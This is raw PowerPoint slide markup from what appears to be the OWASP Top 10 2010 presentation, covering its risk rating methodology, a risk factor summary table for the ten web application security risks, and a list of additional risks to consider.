                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> focused on identifying the most common “vulnerabilities,” these documents have actually always been organized around risks. This caused some understandable confusion on</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> the part of people searching for an airtight weakness taxonomy. This </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>update clarifies</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> the risk-focus in the Top 10 by being more explicit about how threat agents, attack vectors, weaknesses, technical impacts, and business impacts combine to produce risks.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To do so, we developed a Risk Rating methodology for the Top 10 that is based on the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>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The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> defines numerous factors to help calculate</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> the risk of an identified vulnerability. However, the Top 10 must talk about generalities, rather than specific vulnerabilities in real applications. Consequently, we can never be as precise as a system owner can when calculating risk for their application(s). We don’t know how important your applications and data are, what your threat agents are, nor how your system has been built and is being operated.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Our methodology includes three likelihood factors for each</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> weakness </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>prevalence</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>detectability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> and ease of exploit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>) and one</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> impact factor (technical impact). </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>The prevalence of a weakness is </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>a factor that you typically don’t have to calculate. For prevalence data, we have been supplied prevalence statistics from a number of different organizations and we have averaged their data together to come up with a Top 10 likelihood of existence list by prevalence. This data was then combined with the other two likelihood factors (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>detectability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> and ease of exploit) to calculate a likelihood rating for each weakness. This was then multiplied by our estimated average technical impact for each item to come up with an overall risk ranking for each item in the Top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also does not take into account the actual impact on your business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Your organization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> will have to decide how much security risk from applications </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>the organization</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="none" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>is willing to accept. The purpose of the OWASP Top 10 is not to do this risk analysis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The following illustrates our calculation of the risk for A2: Cross-Site Scripting, as an example. Note that XSS is so prevalent that it warranted the only ‘VERY WIDESPREAD’ prevalence value. All other risks ranged from widespread to uncommon (values 1 to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itle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="-14816"/>
            <a:ext cx="5486400" cy="853016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Notes About Risk</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Placeholder 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>+R</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Table 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="121920" y="6461347"/>
          <a:ext cx="6629400" cy="2606455"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
                <a:gridCol w="1104900"/>
              </a:tblGrid>
              <a:tr h="553402">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1782">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VERY WIDESPREAD</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algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRP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61271">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>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0</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endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0"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0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a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0"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27650" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:srcRect t="34128" r="22830" b="30544"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1731326" y="7726680"/>
            <a:ext cx="2322514" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print">
            <a:clrChange>
              <a:clrFrom>
                <a:srgbClr val="FFFFFF"/>
              </a:clrFrom>
              <a:clrTo>
                <a:srgbClr val="FFFFFF">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:clrTo>
            </a:clrChange>
          </a:blip>
          <a:srcRect t="34128" r="22830" b="30544"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2828606" y="8313420"/>
            <a:ext cx="2322514" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3819206" y="8686800"/>
            <a:ext cx="340158" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="1F497D"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Group 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="264795" y="6486527"/>
            <a:ext cx="6380328" cy="585602"/>
            <a:chOff x="304800" y="997426"/>
            <a:chExt cx="6380328" cy="585602"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="30" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2450457" y="1073877"/>
              <a:ext cx="1449386" cy="381000"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="288"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="45"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1" name="Group 63"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="476250" y="997426"/>
              <a:ext cx="139699" cy="304801"/>
              <a:chOff x="96" y="1344"/>
              <a:chExt cx="288" cy="624"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="40"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1"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2"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3"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4"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2" name="AutoShape 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1381125"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3"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5"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6" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="45"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3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38"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39" name="AutoShape 149"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:endCxn id="38"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0" y="1125854"/>
          <a:ext cx="6858000" cy="1617346"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D113A9D2-9D6B-4929-AA2D-F23B5EE8CBE7}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="453304">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>Top 10 Risk Factor Summary</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1"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11640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
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>The following table presents a summary of the 2010 Top 10 Application Security Risks, and the risk factors we have assigned to each risk. These factors were determined based on the available</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> statistics and the experience of the OWASP team</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. To</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> understand these risks for a particular application or organization, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" u="sng" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>you must consider your own specific threat agents and business impacts</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. Even egregious software weaknesses may not present a serious risk if there are no threat agents in a position to perform the necessary attack or the business impact is negligible for the assets involved.</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3" name="Title 62"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Details About Risk Factors</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="Text Placeholder 64"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>+F</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="68" name="Table 67"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2590800"/>
          <a:ext cx="6857999" cy="4066502"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="990600"/>
                <a:gridCol w="753602"/>
                <a:gridCol w="1061688"/>
                <a:gridCol w="1137523"/>
                <a:gridCol w="1061688"/>
                <a:gridCol w="1061688"/>
                <a:gridCol w="791210"/>
              </a:tblGrid>
              <a:tr h="881612">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>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45720" marR="45720">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18489">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>A1-Injection</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A2-XSS</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VERY WIDESPREAD</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A3-Auth’n</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A4-DOR</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A5-CSRF</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WIDESPREAD</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A6-Config</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A7-Crypto</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UNCOMMON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SEVERE</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A8-URL Access</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UNCOMMON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MODERATE</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A9-Transport</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A10-Redirects</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UNCOMMON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2" name="Group 115"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2894014" y="2749185"/>
            <a:ext cx="1449386" cy="381000"/>
            <a:chOff x="2418" y="2736"/>
            <a:chExt cx="750" cy="288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9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9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sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="AutoShape 163"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1885950" y="275871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73" name="AutoShape 85"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5181600" y="2695545"/>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75" name="AutoShape 140"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2721970" y="2943120"/>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76" name="AutoShape 140"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4238625" y="2933700"/>
            <a:ext cx="1009650" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:miter lim="800000"/>
            <a:headEnd type="oval" w="sm" len="sm"/>
            <a:tailEnd type="oval" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="15" name="Table 14"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="6713220"/>
          <a:ext cx="6858000" cy="2415540"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D113A9D2-9D6B-4929-AA2D-F23B5EE8CBE7}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="327853">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-lt"/>
                        </a:rPr>
                        <a:t>Additional Risks to Consider</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1"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20802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The Top 10 cover a lot of ground, but there are other risks that you should consider and evaluate in your organization. Some of these have appeared in previous versions of the OWASP Top 10, and others have not, including new attack techniques that are being identified all the time.  Other important application security risks (listed in alphabetical order) that you should also consider include:</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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Clickjacking</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> (Newly discovered attack technique in 2008)</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Concurrency Flaws</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5"/>
                        </a:rPr>
                        <a:t>Denial of Service</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> (Was 2004 Top 10 – Entry A9)</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6"/>
                        </a:rPr>
                        <a:t>Header Injection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> (also called CRLF Injection)</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7"/>
                        </a:rPr>
                        <a:t>Information Leakage</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Improper Error Handling</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
